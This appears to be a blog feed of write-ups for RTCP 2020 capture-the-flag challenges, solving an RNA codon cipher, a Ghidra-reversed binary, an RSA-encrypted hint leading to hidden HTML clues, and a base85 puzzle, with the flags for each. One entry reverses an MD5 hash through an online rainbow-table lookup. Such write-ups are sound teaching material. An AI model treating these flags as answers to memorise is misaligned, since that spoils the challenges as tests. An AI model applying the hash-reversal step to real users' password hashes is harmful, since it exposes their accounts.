My houseplant and I were working on a biology assignment together. Yes, my houseplant. Don't question it. Anyways, she ended up giving me a new cipher to use in my next project! So I'm giving it to my biology friends to see if they can solve it. They are, after all, studying DNA and mRNA right now.
AUGCAAGGUCUCUUGACCCAGUGGAUACUAAAUGCCUGGAAGGUAGCAUACUAG
Key: 6, 3, 4, 3, 1, 9, 8, 3, 3, 2, 7, 4, 1, 2, 4, 1
Hint : Make sure to encase the plaintext with rtcp{} Spaces are represented by a underscore, (_)
</code></pre></div>
<p>Ok. It a RNA string using the 4 letters for each fundamental units of genetic code (Adenine, Cytosine, Guanine, Uracil). We need to recover the full name of each RNA codon. We can use this picture or the tab in the <a href="https://en.wikipedia.org/wiki/Genetic_code#RNA_codon_table">Wikipedia article</a>.</p>
<p>We are using the key for select the write </p>
<p><img alt="" src="https://img.nlegall.fr/T2Mf5xDh"></p>
<table>
<thead>
<tr>
<th>Index</th>
<th>String</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>Start</td>
</tr>
<tr>
<td>6</td>
<td>Gluta<code>m</code>ine</td>
</tr>
<tr>
<td>3</td>
<td>Gl<code>y</code>cine</td>
</tr>
<tr>
<td>4</td>
<td>Leu<code>c</code>ine</td>
</tr>
<tr>
<td>3</td>
<td>Le<code>u</code>cine</td>
</tr>
<tr>
<td>1</td>
<td><code>T</code>hreonine</td>
</tr>
<tr>
<td>9</td>
<td>Glutamin<code>e</code></td>
</tr>
<tr>
<td>8</td>
<td>Tryptop<code>h</code>an</td>
</tr>
<tr>
<td>3</td>
<td>Is<code>o</code>leucine</td>
</tr>
<tr>
<td>3</td>
<td>Le<code>u</code>cine</td>
</tr>
<tr>
<td>2</td>
<td>A<code>s</code>paragine</td>
</tr>
<tr>
<td>7</td>
<td>Glycin<code>e</code></td>
</tr>
<tr>
<td>4</td>
<td>Try<code>p</code>tophan</td>
</tr>
<tr>
<td>1</td>
<td><code>L</code>ysine</td>
</tr>
<tr>
<td>2</td>
<td>V<code>a</code>line</td>
</tr>
<tr>
<td>4</td>
<td>Ala<code>n</code>ine</td>
</tr>
<tr>
<td>1</td>
<td><code>T</code>yrosine</td>
</tr>
<tr>
<td></td>
<td>Stop</td>
</tr>
</tbody>
</table>
<p>That's give us this final flag with the right case, space and format : <code>rtcp{my_cute_houseplant}</code>.</p>RTCP - Don't Give The GIANt a COOKie2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-dont-give-the-giant-a-cookie.html<p><em>solves : 397</em></p>
<div class="highlight"><pre><span></span><code><span class="n">Point</span> <span class="o">:</span> <span class="mi">100</span>
<span class="n">It</span> <span class="n">was</span> <span class="n">just</span> <span class="n">a</span> <span class="n">typical</span> <span class="n">day</span> <span class="k">in</span> <span class="n">the</span> <span class="n">bakery</span> <span class="k">for</span> <span class="n">Delphine</span><span class="o">.</span> <span class="n">She</span> <span class="n">was</span> <span class="n">preparing</span> <span class="n">her</span> <span class="n">famous</span> <span class="n">chocolate</span> <span class="n">cake</span><span class="o">,</span> <span class="n">when</span> <span class="n">all</span> <span class="n">of</span> <span class="n">a</span> <span class="n">sudden</span> <span class="n">a</span> <span class="n">GIANt</span> <span class="n">burst</span> <span class="n">through</span> <span class="n">the</span> <span class="n">doors</span> <span class="n">of</span> <span class="n">her</span> <span class="n">establishment</span> <span class="n">and</span> <span class="n">demanded</span> <span class="n">a</span> <span class="n">cookie</span><span class="o">.</span> <span class="n">Being</span> <span class="n">the</span> <span class="n">strong</span><span class="o">-</span><span class="n">willed</span> <span class="n">girl</span> <span class="n">she</span> <span class="n">was</span><span class="o">,</span> <span class="n">Delphine</span> <span class="n">refused</span> <span class="n">and …</span></code></pre></div><p><em>solves : 397</em></p>
<div class="highlight"><pre><span></span><code><span class="n">Point</span> <span class="o">:</span> <span class="mi">100</span>
<span class="n">It</span> <span class="n">was</span> <span class="n">just</span> <span class="n">a</span> <span class="n">typical</span> <span class="n">day</span> <span class="k">in</span> <span class="n">the</span> <span class="n">bakery</span> <span class="k">for</span> <span class="n">Delphine</span><span class="o">.</span> <span class="n">She</span> <span class="n">was</span> <span class="n">preparing</span> <span class="n">her</span> <span class="n">famous</span> <span class="n">chocolate</span> <span class="n">cake</span><span class="o">,</span> <span class="n">when</span> <span class="n">all</span> <span class="n">of</span> <span class="n">a</span> <span class="n">sudden</span> <span class="n">a</span> <span class="n">GIANt</span> <span class="n">burst</span> <span class="n">through</span> <span class="n">the</span> <span class="n">doors</span> <span class="n">of</span> <span class="n">her</span> <span class="n">establishment</span> <span class="n">and</span> <span class="n">demanded</span> <span class="n">a</span> <span class="n">cookie</span><span class="o">.</span> <span class="n">Being</span> <span class="n">the</span> <span class="n">strong</span><span class="o">-</span><span class="n">willed</span> <span class="n">girl</span> <span class="n">she</span> <span class="n">was</span><span class="o">,</span> <span class="n">Delphine</span> <span class="n">refused</span> <span class="n">and</span> <span class="n">promptly</span> <span class="n">threw</span> <span class="n">her</span> <span class="n">rolling</span> <span class="n">pin</span> <span class="n">at</span> <span class="n">the</span> <span class="n">GIANt</span><span class="o">.</span> <span class="n">Doing</span> <span class="n">what</span> <span class="n">any</span> <span class="n">sensible</span> <span class="n">being</span> <span class="n">would</span> <span class="k">do</span> <span class="n">when</span> <span class="n">faced</span> <span class="k">with</span> <span class="n">projectiles</span><span class="o">,</span> <span class="n">the</span> <span class="n">GIANt</span> <span class="n">let</span> <span class="n">out</span> <span class="n">a</span> <span class="n">shriek</span> <span class="n">and</span> <span class="n">ran</span> <span class="n">out</span> <span class="n">of</span> <span class="n">the</span> <span class="n">shop</span><span class="o">.</span> <span class="n">Delphine</span> <span class="n">smiled</span> <span class="n">to</span> <span class="n">herself</span><span class="o">,</span> <span class="n">it</span> <span class="n">was</span> <span class="n">another</span> <span class="n">day</span> <span class="n">well</span> <span class="n">done</span><span class="o">.</span>
<span class="n">But</span> <span class="n">oh</span><span class="o">?</span> <span class="n">What</span><span class="err">'</span><span class="n">s</span> <span class="k">this</span><span class="o">?</span> <span class="n">It</span> <span class="n">seems</span> <span class="n">the</span> <span class="n">GIANt</span> <span class="n">dropped</span> <span class="k">this</span> <span class="n">behind</span> <span class="k">while</span> <span class="n">he</span> <span class="n">was</span> <span class="n">screaming</span> <span class="n">and</span> <span class="n">scrambling</span> <span class="n">out</span> <span class="n">of</span> <span class="n">the</span> <span class="n">shop</span><span class="o">.</span>
<span class="mi">69</span><span class="n">acad26c0b7fa29d2df023b4744bf07</span>
</code></pre></div>
<p>We need to reverse a hash. First, check what type is the hash :</p>
<div class="highlight"><pre><span></span><code>$ hashid 69acad26c0b7fa29d2df023b4744bf07
Analyzing <span class="s1">'69acad26c0b7fa29d2df023b4744bf07'</span>
<span class="o">[</span>+<span class="o">]</span> MD5
</code></pre></div>
<p>Ok, perfect. MD5 is easy to revert since a lot of rainbow tables exist to perform this operation. <a href="https://crackstation.net/">Crackstation</a> is one of the website who can do it. We enter the hash and launch the search :</p>
<table>
<thead>
<tr>
<th>Hash</th>
<th>Type</th>
<th>Result</th>
</tr>
</thead>
<tbody>
<tr>
<td>69acad26c0b7fa29d2df023b4744bf07</td>
<td>md5</td>
<td>chocolate mmm</td>
</tr>
</tbody>
</table>
<p>The website found it and give us the clear text from it. We add the flag part and got the final flag : <code>rtcp{chocolate mmm}</code>.</p>RTCP - ghost-in-the-system2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-ghost-in-the-system.html<p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 1500
I think my ls is being haunted... the colors are all weird!!! What's that? It's highlighting things?! Where!!?
Hint: Flag is 100 characters long. It starts with rtcp{ and ends with }. The first character is w
Hint 2: The flag is written in standard …</code></pre></div><p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 1500
I think my ls is being haunted... the colors are all weird!!! What's that? It's highlighting things?! Where!!?
Hint: Flag is 100 characters long. It starts with rtcp{ and ends with }. The first character is w
Hint 2: The flag is written in standard leet, the only exceptions are the flag wrapping (rtcp{}) and underscores (_)
</code></pre></div>
<p>We cab use IDA Pro or Ghidra to get the speudo code from the binary. I used Ghidra for this challenge. We open the file with it, and go to check the <code>main</code> function. We found some code who contain the flag beggin (<code>rtcp</code>) and construct all the flag with the code bellow:</p>
<div class="highlight"><pre><span></span><code> <span class="k">if</span> <span class="p">(</span><span class="n">bVar4</span><span class="p">)</span> <span class="p">{</span>
<span class="n">allocator</span><span class="p">();</span>
<span class="n">basic_string</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span>
<span class="p">(</span><span class="n">allocator</span> <span class="o">*</span><span class="p">)</span>
<span class="s">"s}yvzezqr[..]_eec12"</span>
<span class="p">);</span>
<span class="o">~</span><span class="n">allocator</span><span class="p">((</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">></span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">__for_end</span><span class="p">);</span>
<span class="n">pcVar7</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">operator</span><span class="p">[]((</span><span class="n">basic_string</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">char_traits</span><span class="o"><</span><span class="kt">char</span><span class="o">></span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">>></span>
<span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span><span class="mh">0x1f0</span><span class="p">);</span>
<span class="n">flg</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="n">pcVar7</span><span class="p">;</span>
<span class="n">pcVar7</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">operator</span><span class="p">[]((</span><span class="n">basic_string</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">char_traits</span><span class="o"><</span><span class="kt">char</span><span class="o">></span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">>></span>
<span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span><span class="mh">0x192</span><span class="p">);</span>
<span class="n">flg</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="n">pcVar7</span><span class="p">;</span>
<span class="n">pcVar7</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">operator</span><span class="p">[]((</span><span class="n">basic_string</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">char_traits</span><span class="o"><</span><span class="kt">char</span><span class="o">></span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">>></span>
<span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span><span class="mh">0x322</span><span class="p">);</span>
<span class="n">flg</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="n">pcVar7</span><span class="p">;</span>
<span class="p">[...]</span>
<span class="n">pcVar7</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">operator</span><span class="p">[]((</span><span class="n">basic_string</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">char_traits</span><span class="o"><</span><span class="kt">char</span><span class="o">></span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">>></span>
<span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span><span class="mh">0x2f7</span><span class="p">);</span>
<span class="n">flg</span><span class="p">[</span><span class="mi">98</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="n">pcVar7</span><span class="p">;</span>
<span class="n">pcVar7</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">operator</span><span class="p">[]((</span><span class="n">basic_string</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">char_traits</span><span class="o"><</span><span class="kt">char</span><span class="o">></span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">>></span>
<span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span><span class="mh">0xe6</span><span class="p">);</span>
<span class="n">flg</span><span class="p">[</span><span class="mi">99</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="n">pcVar7</span><span class="p">;</span>
</code></pre></div>
<p>It will take forever to follow the code by hand. A Python script can do it really quicky. I put all the indexes from the code to a file and read each line:</p>
<div class="highlight"><pre><span></span><code><span class="n">a</span> <span class="o">=</span> <span class="s2">"s}yvzezqr_6x45jx2yp4d38qq1mvnsl0u7w32lr12gi}t3i5kw0oewkqb_vv6726}}95cmfy_jfgyx25n1e9cuyvsor_0mijcnhoa2kpvdtjd9js2kstbe5}s6zgyil6qxtr}wbol}dzmg3t02466hu1gkpm2xv8u{ryn0s11uzu_426p8k4owb21f3buof6ok</span><span class="si">{cp9s2s88k3yhzdsq1d2u7n3}</span><span class="s2">9ex}9sly0p0}lp5yxdi7m37_p82o54im1z7bw5u2tu9n2loybmr51jih8lxf7z6n62goh3_63cnnbfczhmsy4pe}ijluq9xbkk4d</span><span class="si">{c13s5hjkjldeww9z}</span><span class="s2">78oyt1pog5qudz{6fkw_wgon99yc{7v4sakj6pddk5i1c_1g74e_xwivk7mmbm16it6zxfc1y6sdz</span><span class="si">{0zrmuvysbl}</span><span class="s2">pmw8z6jb8ejmrqknxbu5w4sv542plnzs8_}znyq6b6x67ar0lsq04qu742uenp4ufoxz7ir8gzohi352}7{9hk{yu4_zbj7gmvl{c_24weh8rwxp_24dhp</span><span class="si">{giv9k}</span><span class="s2">gz840uezqk9s}qxi</span><span class="si">{2u2lbbt4i}</span><span class="s2">kq8gomrqewvrj65dgwaoitc99yh4jest6sccnz2wlgmap6f9k04lhanc3wmgpj6xawln_jce6c6vfttu{zws4odom7{h5hewr_</span><span class="si">{5}</span><span class="s2">6fty4a14ar64q1vvg0s28zsik}nhpmw}j92s42k}zzxx0bn7cddk70iw4</span><span class="si">{f8wqguyj6a58s0u2}</span><span class="s2">xzwh{0vdawdge8n88j6ms8uvt_r4hezvei3u2k179tlepun{c1l02_e92ijk9xx0o_a8gwnmp1jr9gtk2</span><span class="si">{cq7qnmrphvyecps}</span><span class="s2">63cqvxcy</span><span class="si">{i5}</span><span class="s2">d2r1r</span><span class="si">{rg1n}</span><span class="s2">nufm7sue378uwdqe9ezscxoq90nme76}jx4}}b8ahe_paby2qxqwop63kc6eujs7}f90pkkiddlvfobb24wj52wzu2cnhoa_p4jjw4nh9kr5gif04ojbh1e_eec12"</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s2">""</span>
<span class="n">fo</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"index"</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">)</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">fo</span><span class="o">.</span><span class="n">readlines</span><span class="p">():</span>
<span class="n">line</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">rstrip</span><span class="p">()</span>
<span class="c1"># Convert hex value do decimal</span>
<span class="n">line</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">line</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span>
<span class="n">flag</span> <span class="o">=</span> <span class="n">flag</span> <span class="o">+</span> <span class="n">a</span><span class="p">[</span><span class="n">line</span><span class="p">]</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div>
<p>We run it and got the flag!</p>
<div class="highlight"><pre><span></span><code>$ python ghost.py
rtcp<span class="o">{</span>wh37h3r_1n4n1m473_f16ur35_0r_un4u7h0r1z3d_c0d3_7h3r35_4lw4y5_4_6h057_1n_7h3_5y573m_1056_726_00<span class="o">}</span>
</code></pre></div>RTCP - Growls at the chicken2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-growls-at-the-chicken.html<p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 1000
grrrrrrR
big chicken, i hisS At you!!!
hint: NQr2MIa1jsaifAVOn3zYeMynNJwd4oBiiem4fJHsA1WjzfyhUp1+seCW0GMijoDHb3w9BMKj7aw6hhtae5/Qw5xOqMioJU3vvEj0BEHO1wInPqlOeTRdZb8BcTsXP+Z/KBA2FjSZcpGHo7rOZ7NtR15y3eY4s/e/tgKUHvPe9MdmDe1kINtyRXgjghJO9e3uMEQmFe2Ai5moVnG7yIVfUd3QG6/Z+K4PSttbJtjWSLFO7zpmYpEOg3XBxsOw/w5scJQqJ7OLGiH22u4+JFXRlD/wPmDzk9uYlLWLcCuxnY0xuMlSfKIFJtVmF0ViO4o4X89ZwsQjjHuYYDaB3el7iA63BzBlsC54Q7Ekv70/GI0UA3R3zJkMaBV12Z6NAE/kAgEJu9ZRcVm6MAIZInLwMU4R1frM0Bks1jeTe72agmxnAIrR8XDeAxzovbvXFwoxNyxiA63fPJGPVoGZq4ecfGvJ23i/Cg+cynB35lc3f+4QifpjCn+MxWkKCzCVEJXdDah19yXKlIxbaR1zm+YHkS0YSUzjr7NJUXHfDCrwAUpXpikfi2f9tgcXEnuhszScE1PCbdt22rRz1pS7MNdRxjCZ5j+8BQNRBLi2BjLGW14X3zd4d6ieoHWH+4fmbqU9dFsUgKN5qL4Gs2LZbbQwkf3+VbIRQK9RaSO9Hj+4/T0=
hint 2: Public [...]
hint 3: Private [...]
</code></pre></div>
<p>Ok, We have a base64 encoded message with …</p><p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 1000
grrrrrrR
big chicken, i hisS At you!!!
hint: NQr2MIa1jsaifAVOn3zYeMynNJwd4oBiiem4fJHsA1WjzfyhUp1+seCW0GMijoDHb3w9BMKj7aw6hhtae5/Qw5xOqMioJU3vvEj0BEHO1wInPqlOeTRdZb8BcTsXP+Z/KBA2FjSZcpGHo7rOZ7NtR15y3eY4s/e/tgKUHvPe9MdmDe1kINtyRXgjghJO9e3uMEQmFe2Ai5moVnG7yIVfUd3QG6/Z+K4PSttbJtjWSLFO7zpmYpEOg3XBxsOw/w5scJQqJ7OLGiH22u4+JFXRlD/wPmDzk9uYlLWLcCuxnY0xuMlSfKIFJtVmF0ViO4o4X89ZwsQjjHuYYDaB3el7iA63BzBlsC54Q7Ekv70/GI0UA3R3zJkMaBV12Z6NAE/kAgEJu9ZRcVm6MAIZInLwMU4R1frM0Bks1jeTe72agmxnAIrR8XDeAxzovbvXFwoxNyxiA63fPJGPVoGZq4ecfGvJ23i/Cg+cynB35lc3f+4QifpjCn+MxWkKCzCVEJXdDah19yXKlIxbaR1zm+YHkS0YSUzjr7NJUXHfDCrwAUpXpikfi2f9tgcXEnuhszScE1PCbdt22rRz1pS7MNdRxjCZ5j+8BQNRBLi2BjLGW14X3zd4d6ieoHWH+4fmbqU9dFsUgKN5qL4Gs2LZbbQwkf3+VbIRQK9RaSO9Hj+4/T0=
hint 2: Public [...]
hint 3: Private [...]
</code></pre></div>
<p>Ok, We have a base64 encoded message with a public thing and private thing. If we read the description carefully, the maj letter make the word <code>RSA</code>. The two others strings are the public key and private key. We don't need the public one to decrypt.</p>
<p>We can reconstruct the private key with adding the header and footer and replace all space with new line:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"-----BEGIN RSA PRIVATE KEY-----"</span> > private.key
$ <span class="nb">echo</span> <span class="s2">"MIIJKQIBAAKCAg[...]QdgsTn"</span> >> private.key
$ <span class="nb">echo</span> <span class="s2">"-----END RSA PRIVATE KEY-----"</span> >> private.key
$ sed -i <span class="s1">'/^-----/! s/ /\n/g'</span> private.key
$ cat message<span class="p">|</span> base64 -d <span class="p">|</span> openssl rsautl -decrypt -inkey private.key -in -
unknown-123-246-470-726.herokuapp.com
</code></pre></div>
<p>The clear text is a link to a website:</p>
<p><a href="https://unknown-123-246-470-726.herokuapp.com/">https://unknown-123-246-470-726.herokuapp.com/</a></p>
<p><img alt="chicken1" src="https://blog.nlegall.fr/images/rtcp/chicken1.png"></p>
<p>We got a wonderful GIF and some text in the console log:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Jade: psst'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Jade: You there?'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Agate: *laughs*'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Jade: Well lets hope the chicken doesnt explod'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Agate: Hah, didnt Jess leave a defuser?'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Jade: Yep, its in the drawer'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Agate: Ill grab it.'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'ono.'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
</code></pre></div>
<p>When we open the source code, we can see two other div hidden:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">p</span> <span class="na">hidden</span><span class="p">></span>9 20 30 15 16 5 14 19 30 27 29 8 20 13 12 28<span class="p"></</span><span class="nt">p</span><span class="p">></span>
<span class="p"><</span><span class="nt">p</span> <span class="na">hidden</span><span class="p">></span>"abcdefghijklmnopqrstuvwxyz[]. "<span class="p"></</span><span class="nt">p</span><span class="p">></span>
</code></pre></div>
<p>Ok, let's start for mapping the both together:</p>
<div class="highlight"><pre><span></span><code><span class="n">keys</span> <span class="o">=</span> <span class="p">[</span><span class="mi">9</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">28</span><span class="p">]</span>
<span class="n">chars</span> <span class="o">=</span> <span class="s2">"abcdefghijklmnopqrstuvwxyz[]. "</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s2">""</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">keys</span><span class="p">:</span>
<span class="n">flag</span> <span class="o">=</span> <span class="n">flag</span> <span class="o">+</span> <span class="n">chars</span><span class="p">[</span><span class="n">x</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>$ python map.py
it opens <span class="o">[</span>.html<span class="o">]</span>
</code></pre></div>
<p>Hum. Seems to indicate a new link but we need to find the first part. The answer comes from the dialog between the characters: <code>Yep, its in the drawer</code>. We got then the full link: <a href="https://unknown-123-246-470-726.herokuapp.com/drawer.html">https://unknown-123-246-470-726.herokuapp.com/drawer.html</a>.</p>
<p><img alt="chicken1" src="https://blog.nlegall.fr/images/rtcp/chicken1.png"></p>
<p>The same page is showing up. But, one more time, we find some relevant informations from the source code:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">p</span> <span class="na">hidden</span><span class="p">></span>rtcp{ch1ck3n_4nd_th3_3gg}<span class="p"></</span><span class="nt">p</span><span class="p">></span>
</code></pre></div>RTCP - HOOOOOOOOOOMEEEEEE RUNNNNNNNNNNNNN!!!!!2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-hoooooooooomeeeeee-runnnnnnnnnnnnn.html<p><em>solves : 605</em></p>
<div class="highlight"><pre><span></span><code><span class="n">Point</span> <span class="o">:</span> <span class="mi">50</span>
<span class="n">AND</span> <span class="n">JAKE</span> <span class="n">IS</span> <span class="n">ROUNDING</span> <span class="n">THE</span> <span class="n">BASES</span>
<span class="n">HE</span> <span class="n">PASSES</span> <span class="n">BASE</span> <span class="mi">32</span><span class="o">!!!</span>
<span class="n">HE</span> <span class="n">ROUNDS</span> <span class="n">BASE</span> <span class="mi">64</span><span class="o">!!!!!!!</span>
<span class="n">WE</span><span class="s1">'RE WITNESSING A MIRACLE!!!!!!!!!!!!!</span>
<span class="s1">Just one more base to go ;D</span>
<span class="s1">Hint : Ecbf1HZ_kd8jR5K?[";(7;aJp?[4>J?Slk3<+n'</span><span class="n">pF</span><span class="o">]</span><span class="n">W</span><span class="o">^,</span><span class="n">F</span><span class="o">>.</span><span class="n">_lB</span><span class="o">/=</span><span class="n">r</span>
</code></pre></div>
<p>We are looking for the a new …</p><p><em>solves : 605</em></p>
<div class="highlight"><pre><span></span><code><span class="n">Point</span> <span class="o">:</span> <span class="mi">50</span>
<span class="n">AND</span> <span class="n">JAKE</span> <span class="n">IS</span> <span class="n">ROUNDING</span> <span class="n">THE</span> <span class="n">BASES</span>
<span class="n">HE</span> <span class="n">PASSES</span> <span class="n">BASE</span> <span class="mi">32</span><span class="o">!!!</span>
<span class="n">HE</span> <span class="n">ROUNDS</span> <span class="n">BASE</span> <span class="mi">64</span><span class="o">!!!!!!!</span>
<span class="n">WE</span><span class="s1">'RE WITNESSING A MIRACLE!!!!!!!!!!!!!</span>
<span class="s1">Just one more base to go ;D</span>
<span class="s1">Hint : Ecbf1HZ_kd8jR5K?[";(7;aJp?[4>J?Slk3<+n'</span><span class="n">pF</span><span class="o">]</span><span class="n">W</span><span class="o">^,</span><span class="n">F</span><span class="o">>.</span><span class="n">_lB</span><span class="o">/=</span><span class="n">r</span>
</code></pre></div>
<p>We are looking for the a new base encoding and this base is the next one after base64. It's not base128 and should be a base between 64 et 128.</p>
<p>After some research, we found that the base85 exists. We can use it with the code found in github : <a href="https://github.com/judsonx/base85">https://github.com/judsonx/base85</a>.</p>
<p>We clone, build and make the code from the source. We can put the hint within a file or use <code>|</code> to avoit it.</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"Ecbf1HZ_kd8jR5K?[\";(7;aJp?[4>J?Slk3<+n'pF]W^,F>._lB/=r"</span> <span class="p">|</span> ./build/ascii85 -d
rtcp<span class="o">{</span>uH_JAk3_w3REn<span class="err">'</span>t_y0u_4t_Th3_uWust0r4g3<span class="o">}</span>
</code></pre></div>RTCP - Hump's Day2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-humps-day.html<p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 1050
Happy Hump's Day
Happy TGIF!
Happy Saturday
Happy Tuesday +1
Happy Thursday +1
Happy TGIF -2
Happy Monday!
Happy Hump's day +5 3 times
Happy Saturday +3
Happy TGIF +1
Happy Tuesday +0
Happy Friday +3
Happy TGIF -1
Happy Wednesday
Happy TGIF
Happy …</code></pre></div><p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 1050
Happy Hump's Day
Happy TGIF!
Happy Saturday
Happy Tuesday +1
Happy Thursday +1
Happy TGIF -2
Happy Monday!
Happy Hump's day +5 3 times
Happy Saturday +3
Happy TGIF +1
Happy Tuesday +0
Happy Friday +3
Happy TGIF -1
Happy Wednesday
Happy TGIF
Happy Sunday
Happy Saturday -5
Hint: Hump's day is on what day of this ctf?
Hint 2: The Lotus would be proud. Decimate your enemies, gather more hexenon, string the grineer up! simple. Isn't it?
</code></pre></div>
<p>The hint gives us the correspondence for the <code>Hump's Day</code>: Wednesday.</p>
<p>We can use the number of the day in the month (<code>22</code>) or the week relative number (<code>3</code>, as Sunday is <code>0</code>).</p>
